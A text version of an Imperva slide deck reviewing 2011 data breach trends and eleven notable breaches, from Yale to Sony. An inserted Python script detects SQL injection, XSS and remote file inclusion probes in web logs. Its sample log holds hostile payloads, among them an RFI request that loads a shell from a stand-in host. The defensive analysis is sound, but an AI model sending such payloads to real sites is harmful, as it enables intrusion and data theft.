Top 11 Ground-Breaking Data Breaches of 2011 Robert Rachwald Director, Security Strategy, Imperva

Top 11 Data Breaches of 2011


DESCRIPTION

Every year, motivations, tactics, and technologies shift as defenses change and attackers are forced to readjust. This presentation investigates what made 2011 data breaches different, novel, and innovative. The presentation examines the top eleven data breaches of 2011, compares data breach trends in 2011 versus 2010, and provides guidance for 2012 data security initiatives based on lessons from 2011.


Page 1: Top 11 Data Breaches of 2011

Top 11 Ground-Breaking Data Breaches of 2011

Robert Rachwald Director, Security Strategy, Imperva

Page 2: Top 11 Data Breaches of 2011

Agenda

+ Compare data breach trends in 2011 versus 2010
+ Examine the top eleven data security breaches of 2011
+ Provide guidance for 2012 data security initiatives based on lessons from 2011

Page 3: Top 11 Data Breaches of 2011

Today’s Presenter Rob Rachwald, Dir. of Security Strategy, Imperva

Research
+ Directs security strategy
+ Works with the Imperva Application Defense Center

Security experience
+ Fortify Software and Coverity
+ Helped secure Intel’s supply chain software
+ Extensive international experience in Japan, China, France, and Australia

Thought leadership
+ Presented at RSA, InfoSec, OWASP, ISACA
+ Appearances on CNN, SkyNews, BBC, NY Times, and USA Today

Graduated from University of California, Berkeley

Page 4: Top 11 Data Breaches of 2011

Looking Back

Page 5: Top 11 Data Breaches of 2011

Volume of Stolen Data

[Chart: Volume of Data Taken for 2009, 2010 and 2011; y-axis 0 to 250,000,000]

Source: privacyrights.org

Page 6: Top 11 Data Breaches of 2011

Volume of Stolen Data

[Chart: the same Volume of Data Taken chart for 2009, 2010 and 2011 (y-axis 0 to 250,000,000), annotated with the VA Breach and the Heartland Payment Systems Breach]

Source: privacyrights.org

Page 7: Top 11 Data Breaches of 2011

Number of Data Breach Incidents

[Chart: Number of Data Breach Incidents for 2009, 2010 and 2011; y-axis 0 to 500; data labels on the chart read 250, 484 and 424]

Source: privacyrights.org

Page 8: Top 11 Data Breaches of 2011

Volume of Stolen Data by Type

[Chart: Volume of Data Taken for 2009, 2010 and 2011 by breach type: Insider, Physical Loss, Stationary Device, Unknown, Payment Fraud; y-axis 0 to 3,000,000]

Source: privacyrights.org

Page 9: Top 11 Data Breaches of 2011

Volume of Stolen Data by Type

[Chart: Volume of Data Taken for 2009, 2010 and 2011 by breach type: Hack, Portable Device; y-axis 0 to 140,000,000]

Source: privacyrights.org

Page 10: Top 11 Data Breaches of 2011

The Insider Threat

Malicious Insider 33%

Non Malicious Insider 38%

Hacker 29%

Source: Securosis 2010 Data Security Survey

Page 11: Top 11 Data Breaches of 2011

Data Records Taken by Vertical I

[Chart: Volume of Data Taken for 2009, 2010 and 2011 by vertical: Financial/Insurance, Government; y-axis 0 to 140,000,000]

Source: privacyrights.org

Page 12: Top 11 Data Breaches of 2011

Data Records Taken by Vertical II

[Chart: Volume of Data Taken for 2009, 2010 and 2011 by vertical: Medical, Education, Other, Retail, Nonprofit; y-axis 0 to 14,000,000]

Source: privacyrights.org

Page 13: Top 11 Data Breaches of 2011

Data Records Taken by Vertical II

[Chart: same chart as page 12 (Medical, Education, Other, Retail, Nonprofit; 2009, 2010 and 2011; y-axis 0 to 14,000,000)]

Source: privacyrights.org

Page 14: Top 11 Data Breaches of 2011

Number of Data Breach Incidents by Vertical

[Chart: Number of Data Breach Incidents by vertical for 2009, 2010 and 2011; y-axis 0 to 500]

Source: privacyrights.org

Page 15: Top 11 Data Breaches of 2011

Software Security Spend Growth

[Chart: worldwide security software spend in billion USD: $14.80 in 2009, $16.50 in 2010, an 11% increase]

Source: Imthishan Giado. “Global security spend to blast past $16 billion.” ITP.net. 23 Aug 2010.

Page 16: Top 11 Data Breaches of 2011

Cyber Crime Milestones

Page 17: Top 11 Data Breaches of 2011

#1: In 2010, Digital Theft Exceeded Physical

“Reported thefts of information and electronic data have risen by half in the past year and for the first time have surpassed physical property losses as the biggest crime problem for global companies…”

[Chart: Cost per $1B; Physical Assets 1.4, Digital Assets 1.7]

Source: Brooke Masters and Joseph Menn. “Data theft overtakes physical losses.” FT.com. 18 Oct. 2010.

Page 18: Top 11 Data Breaches of 2011

#2: Enterprises in the Cross Hairs

“The bad guys have figured out that rather than getting $500 from 1,000 accounts you can get $500,000 from one corporate account in one go…”

Source: Brooke Masters and Mary Watkins. “Hackers turn attention to corporate data theft.” FT.com. 18 Oct. 2010.

Page 19: Top 11 Data Breaches of 2011

#3: Hacktivism Goes Corporate

Lulzsec: team of hackers focused on breaking applications and databases

Hacking for profit: strong similarity to the attacks employed by Lulzsec during their campaign

Lulzsec used:
+ SQL injection (SQLi)
+ Cross-site scripting (XSS)
+ Remote file inclusion (RFI)

Page 20: Top 11 Data Breaches of 2011

#4: Automation is Prevailing

“investigators noticed a higher proportion of automation with respect to attack methods…”

Source: Verizon Data Breach Report, 2010

Page 21: Top 11 Data Breaches of 2011

#4: Automation is Prevailing

On Average: 27 attacks per hour

≈ 1 probe every two minutes

Apps under automated attack: 25,000 attacks per hour.

≈ 7 per second
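As an added defender-side example (not from the deck, and not Imperva's code), the following Python script applies the point of slides 19 and 21 to a web server's access log: it tags requests that carry coarse SQL injection, cross-site scripting or remote file inclusion indicators, counts them by class and source address, and works out the probe rate per hour, the figure the deck gives as 27 attacks per hour on average. The log lines, IP addresses, host name and indicator patterns are constructed for the illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Common Log Format lines for the example; they are invented for
# this illustration and do not come from the deck or any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2011:10:00:01 +0000] "GET /products.php?id=7 HTTP/1.1" 200 2048
203.0.113.7 - - [12/Aug/2011:10:00:03 +0000] "GET /products.php?id=7%27%20OR%201%3D1-- HTTP/1.1" 500 512
203.0.113.7 - - [12/Aug/2011:10:00:05 +0000] "GET /products.php?id=7%20UNION%20SELECT%201,2,3 HTTP/1.1" 500 512
198.51.100.4 - - [12/Aug/2011:10:01:10 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024
198.51.100.4 - - [12/Aug/2011:10:01:12 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 300
192.0.2.9 - - [12/Aug/2011:11:30:00 +0000] "GET /about.html HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Indicator patterns for the three technique classes the deck names. They are
# deliberately coarse: the aim is to surface probing activity for triage and
# rate measurement, not to serve as a blocking rule.
INDICATORS = {
    "sqli": re.compile(r"(?i)('\s*or\s+\d+\s*=\s*\d+|union\s+select)"),
    "xss": re.compile(r"(?i)(<script|javascript:|onerror\s*=)"),
    "rfi": re.compile(r"(?i)=\s*(?:https?|ftp)://"),
}


def parse_line(line):
    """Return a dict with ip, ts, method, path and status for one log line, or None."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(path):
    """Tag a request path with the indicator classes it matches.

    The path is URL-decoded once before matching so that %27 / %3C style
    encoding does not hide the payload from the patterns.
    """
    decoded = unquote_plus(path)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))


def summarize(log_text):
    """Count probes by class and by source, and compute the hourly probe rate."""
    by_type, by_ip, hours = Counter(), Counter(), set()
    total = probes = 0
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        total += 1
        hours.add(rec["ts"][:14])  # "dd/Mon/yyyy:HH" bucket of the timestamp
        tags = classify(rec["path"])
        if tags:
            probes += 1
            by_ip[rec["ip"]] += 1
            for t in tags:
                by_type[t] += 1
    return {
        "total_requests": total,
        "probes": probes,
        "by_type": by_type,
        "by_ip": by_ip,
        "hours_observed": len(hours),
        "probes_per_hour": probes / len(hours) if hours else 0.0,
    }


if __name__ == "__main__":
    result = summarize(SAMPLE_LOG)
    print(f"{result['probes']} probes in {result['total_requests']} requests "
          f"over {result['hours_observed']} hour(s): "
          f"{result['probes_per_hour']:.1f} per hour")
    print("by type:", dict(result["by_type"]))
    print("by source:", dict(result["by_ip"]))
```

On the sample above the script reports 4 probes over 2 observed hours (2 SQLi, 1 XSS, 1 RFI), far below the deck's 27-per-hour average; the useful operational signal is the change in that rate over time and the concentration of probes on a few source addresses. The single URL-decoding step is a known gap: double-encoded payloads pass through untagged, so a production version would decode repeatedly up to a limit and tune the patterns against the application's own traffic.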

Page 22: Top 11 Data Breaches of 2011

#5: Security 2.0 May Be Coming

“The top five security providers — led by Symantec and McAfee — accounted for 44 percent of the $16.5 billion worldwide security software market in 2010, according to Gartner. That’s down from 60 percent in 2006.”

Source: Dina Bass and Zachary Tracer. “Hacker ‘Armageddon’ Forces Symantec, McAfee to Seek Fixes.” Bloomberg.com. 4 Aug. 2011.

Page 23: Top 11 Data Breaches of 2011

#5: Security 2.0 May Be Coming

“The security industry may need to reconsider some of its fundamental assumptions, including 'Are we really protecting users and companies?’”

--McAfee, August 2011

Source: Dan Rowinski. “McAfee to Security Industry: 'Are We Really Protecting Users and Companies?‘” The New York Times. 23 Aug. 2011.

Page 24: Top 11 Data Breaches of 2011

Top 11 Ground-Breaking Breaches of 2011

Page 25: Top 11 Data Breaches of 2011

#11: Yale University

Page 26: Top 11 Data Breaches of 2011

The Details

Breach Size: 43,000 records
Date: August 2011
Source: Network World
Significance:
+ Google hacking in action
+ “The breach resulted when a File Transfer Protocol (FTP) server on which the data was stored became searchable via Google as the result of a change the search engine giant made last September.”
+ Yale blamed Google!

Source: Jaikumar Vijayan. “Yale warns 43,000 about 10-month-long data breach”. Network World. 22 Aug. 2011.

Page 27: Top 11 Data Breaches of 2011

#10: Cars for Sale Online

Page 28: Top 11 Data Breaches of 2011

The Details

Breach Size:
+ $44.5M in consumer fraud
+ 14,000 reported incidents to law enforcement
Date: August 2011
Source: Network World
Significance:
+ XSS attack moved victims to…
+ …Spoofed websites
+ Strong use of social networking

Source: Michael Cooney. “FBI warns of growing car-buying cyberscams”. Network World. 16 Aug. 2011.

Page 29: Top 11 Data Breaches of 2011

The Facebook Page Still Exists!

Page 30: Top 11 Data Breaches of 2011

#9: Medical Records Leaked and Placed Online

Page 31: Top 11 Data Breaches of 2011

The Details

Breach Size: 300,000 medical records
Date: September 2011
Source: Chicago Tribune
Significance:
+ Highlights the persistent interest in medical records
+ Illustrates how criminals and non-criminals can use medical records
  – Criminals: Blackmail and public humiliation
  – Non-criminals: "The information can also be used by insurance companies to inflate rates, or by employers to deny job applicants."
+ Highlights the gaps with HIPAA HITECH
+ Foreshadows issues with broader digitization of electronic health records

Source: Chicago Tribune, Sept. 2011.

Page 32: Top 11 Data Breaches of 2011

#8: Cyworld

Page 33: Top 11 Data Breaches of 2011

What is Cyworld?

Page 34: Top 11 Data Breaches of 2011

The Details

Breach Size: 35M records
+ Including phone numbers, email addresses, names, and encrypted information about the sites’ members
Date: July 2011
Source: BBC
Significance:
+ Facebook claims 800M users today
+ Social engineering is one of the fastest growing topics in hacker forums

Source: “Millions hit in South Korean hack.” BBC News. 28 Jul. 2011.

Page 35: Top 11 Data Breaches of 2011

#7: Facebook

Page 36: Top 11 Data Breaches of 2011

The Details

Breach Size: 7K downloads per week
Date: September 2011
Source: code.google.com
Significance:
+ Automated Facebook hacking
+ Broader implications for social networking:
  – Give job recommendations over LinkedIn
  – Provide a bridgehead for further social engineering
    • Ask your IT Admin (over FB – since you are friends now!) “I can't login to something, can you reset my password?”
    • Defraud relatives with money scams: "I'm stuck in Vegas with no money."

Source: “fbpwn.” http://code.google.com/p/fbpwn/

Page 37: Top 11 Data Breaches of 2011

How it Works

Page 38: Top 11 Data Breaches of 2011

#6: Social Bots

Page 39: Top 11 Data Breaches of 2011

The Details

Breach Size:
+ A small array of scripts programmed to pass themselves off as real people stole 250 gigabytes worth of personal information from Facebook users in just eight weeks
Date: November 2011
Source: The Register
Significance:
+ Automated Facebook hacking
+ Highlighted the weaknesses of Facebook’s security

Source: Dan Goodin. “Army of 'socialbots' steal gigabytes of Facebook user data.” The Register. 1 Nov. 2011.

Page 40: Top 11 Data Breaches of 2011

#5: PBS

Page 41: Top 11 Data Breaches of 2011

The Details

Breach Size:
+ Thousands of usernames/passwords breached
+ Tupac resurrected
Date: May 2011
Source: The New York Times
Significance:
+ Media wake-up call
+ SQL injection becomes a common business term

Source: John Markoff. “Hackers Disrupt PBS Web Site and Post a Fake Report About a Rap Artist.” The New York Times. 30 May 2011.

Page 42: Top 11 Data Breaches of 2011

#4: Phone Hacking

Page 43: Top 11 Data Breaches of 2011

The Details

Breach Size: If you have to ask…
Date: July 2011
Significance:
+ Hacking becomes part of our everyday lives
+ Anti-virus, firewalls, code review, etc…: USELESS

Source: “News International phone hacking scandal.” Wikipedia.

Page 44: Top 11 Data Breaches of 2011

#3: Sony

Page 45: Top 11 Data Breaches of 2011

Need To Justify The Cost of Security?

Page 46: Top 11 Data Breaches of 2011

The Details

Breach Size:
+ 100M credit cards (12M unencrypted)
Date: April 2011
Source: Playstation.blog
Significance:
+ Security becomes a business problem, not just a set of technologies
  – Data governance just as important as financial reporting or brand management
  – Put the role of a CISO in perspective: You need one!

Source: Patrick Seybold. “A Letter from Howard Stringer.” 5 May 2011.

Page 47: Top 11 Data Breaches of 2011

#2: Government Web Sites for Sale

Page 48: Top 11 Data Breaches of 2011

The Details

Breach Size: Dozens of websites for sale
Date: January 2011
Source: Krebsonsecurity.com
Significance:
“Amid all of the media and public fascination with threats like Stuxnet and weighty terms such as “cyberwar,” it’s easy to overlook the more humdrum and persistent security threats, such as Web site vulnerabilities. But none of these distractions should excuse U.S. military leaders from making sure their Web sites aren’t trivially hackable by script kiddies.”

Source: Brian Krebs. “Ready for Cyberwar?” Krebsonsecurity.com. 21 Jan. 2011.

Page 49: Top 11 Data Breaches of 2011

#1: Chinese Hacking Industry Exposed

Page 50: Top 11 Data Breaches of 2011

The Details

Breach Size: No one knows
Date: April 2011
Source: Sky News
Significance:
+ Highlights the partnership between government, hacking, and industry in China
+ Evidence that China is winning in their intention to be “the leader in information warfare”

Source: Holly Williams. “China's Cyber Hackers Target Western Firms.” Sky News. 18 Apr. 2011.

Page 51: Top 11 Data Breaches of 2011

Further Context

Page 52: Top 11 Data Breaches of 2011

Further Context

Page 53: Top 11 Data Breaches of 2011

About Imperva

Page 54: Top 11 Data Breaches of 2011

Usage Audit

Access Control

Rights Management

Attack Protection

Reputation Controls

Virtual Patching

Our Story in 60 Seconds

Page 55: Top 11 Data Breaches of 2011

Webinar Materials

Post-Webinar Discussions

Answers to Attendee Questions

Webinar Recording Link Webinar Slides

Get LinkedIn to Imperva Data Security Direct for…

Page 56: Top 11 Data Breaches of 2011

www.imperva.com